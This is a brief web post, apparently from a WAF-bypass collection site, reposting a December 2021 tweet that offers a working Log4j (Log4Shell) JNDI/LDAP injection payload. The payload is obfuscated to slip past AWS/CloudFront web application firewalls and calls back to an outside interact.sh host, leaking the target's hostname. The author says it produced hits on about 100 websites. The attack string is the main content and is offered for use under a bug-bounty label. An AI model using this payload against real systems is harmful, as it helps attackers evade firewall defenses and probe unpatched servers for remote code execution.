WAF bypass LDAP injection by naglinagli

Date: December 24, 2021Author: wafbypass

Working AWS/Cloudfront #log4j WAF Bypass within the URI path

https:\/\/hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}}

Please note that AWS WAF is self configurable, but I got hits on ~100 websites today with this payload.

#BugBounty https://t.co/7awtKeCRbN

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools